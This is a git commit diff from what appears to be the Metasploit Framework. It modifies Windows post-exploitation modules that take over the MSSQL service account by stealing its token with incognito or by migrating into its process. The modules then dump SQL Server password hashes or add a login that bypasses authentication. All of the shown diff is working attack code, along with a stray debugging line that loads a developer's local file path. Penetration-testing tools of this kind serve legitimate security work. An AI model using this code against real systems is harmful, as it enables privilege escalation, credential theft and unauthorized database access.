Use incognito token stealing rather than process migration if we have

the privileges required for successful impersonation.
2015-02-24 23:14:49 +00:00 · 2015-02-24 23:14:49 +00:00 · 99f79e8533
parent 9c2219124c
commit 99f79e8533
3 changed files with 65 additions and 39 deletions
--- a/lib/msf/core/post/windows/mssql.rb
+++ b/lib/msf/core/post/windows/mssql.rb
@ -100,20 +100,43 @@ module MSSQL
  def impersonate_sql_user(service)
    pid = service[:pid]
    vprint_status("Current user: #{session.sys.config.getuid}")
+    current_privs = client.sys.config.getprivs
+    if current_privs.include?('SeImpersonatePrivilege') ||
+       current_privs.include?('SeTcbPrivilege') ||
+       current_privs.include?('SeAssignPrimaryTokenPrivilege')
+      username = nil
+      session.sys.process.each_process do |process|
+        if process['pid'] == pid
+          username = process['user']
+          break
+        end
+      end

-    # Attempt to migrate to target sqlservr.exe process
-    # Migrating works, but I can't rev2self after its complete
-    print_warning("Attempting to migrate to process #{pid}...")
-    begin
-      session.core.migrate(pid)
-    rescue Rex::RuntimeError => e
-      print_error(e.to_s)
-      return false
+      session.core.use('incognito') unless session.incognito
+      vprint_status("Attemping to impersonate user: #{username}")
+      res = session.incognito.incognito_impersonate_token(username)
+
+      if res =~ /Successfully/i
+        print_good("Impersonated user: #{username}")
+        return true
+      else
+        return false
+      end
+    else
+      # Attempt to migrate to target sqlservr.exe process
+      # Migrating works, but I can't rev2self after its complete
+      print_warning("No SeImpersonatePrivilege, attempting to migrate to process #{pid}...")
+      begin
+        session.core.migrate(pid)
+      rescue Rex::RuntimeError => e
+        print_error(e.to_s)
+        return false
+      end
+
+      vprint_status("Current user: #{session.sys.config.getuid}")
+      print_good("Successfully migrated to sqlservr.exe process #{pid}")
    end

-    vprint_status("Current user: #{session.sys.config.getuid}")
-    print_good("Successfully migrated to sqlservr.exe process #{pid}")
-
    true
  end

--- a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb
+++ b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb
@ -47,23 +47,25 @@ class Metasploit3 < Msf::Post
    system_status = get_system
    fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status

-    service = check_for_sqlserver(instance)
-    fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
-
-    print_status("Identified service '#{service[:display]}', PID: #{service[:pid]}")
-    instance_name = service[:display].gsub('SQL Server (','').gsub(')','').lstrip.rstrip
-
    begin
-      get_sql_hash(instance_name)
-    rescue RuntimeError
-      # Attempt to impersonate sql server service account (for sql server 2012)
-      if impersonate_sql_user(service)
-        get_sql_hash(instance_name)
-      end
-    end
+      service = check_for_sqlserver(instance)
+      fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service

-    # return to original priv context
-    session.sys.config.revert_to_self
+      print_status("Identified service '#{service[:display]}', PID: #{service[:pid]}")
+      instance_name = service[:display].gsub('SQL Server (','').gsub(')','').lstrip.rstrip
+
+      begin
+        get_sql_hash(instance_name)
+      rescue RuntimeError
+        # Attempt to impersonate sql server service account (for sql server 2012)
+        if impersonate_sql_user(service)
+          get_sql_hash(instance_name)
+        end
+      end
+    ensure
+      # return to original priv context
+      session.sys.config.revert_to_self
+    end
  end

  def get_sql_version(instance_name)
--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@ -6,7 +6,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/post/windows/mssql'
-
+load '/home/ben/git/metasploit-framework/lib/msf/core/post/windows/mssql.rb'
 class Metasploit3 < Msf::Post

  include Msf::Post::Windows::MSSQL
@ -56,21 +56,22 @@ class Metasploit3 < Msf::Post
    # Get LocalSystem privileges
    system_status = get_system
    fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
+    begin
+      service = check_for_sqlserver(instance)
+      fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service

-    service = check_for_sqlserver(instance)
-    fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
+      print_status("Identified service '#{service[:display]}', PID: #{service[:pid]}")
+      instance_name = service[:display].gsub('SQL Server (','').gsub(')','').lstrip.rstrip

-    print_status("Identified service '#{service[:display]}', PID: #{service[:pid]}")
-    instance_name = service[:display].gsub('SQL Server (','').gsub(')','').lstrip.rstrip
-
-    if datastore['REMOVE_LOGIN']
-      remove_login(service, instance_name)
-    else
-      add_login(service, instance_name)
+      if datastore['REMOVE_LOGIN']
+        remove_login(service, instance_name)
+      else
+        add_login(service, instance_name)
+      end
+    ensure
+      # attempt to return to original priv context
+      session.sys.config.revert_to_self
    end
-
-    # attempt to return to original priv context
-    session.sys.config.revert_to_self
  end

  def add_login(service, instance_name)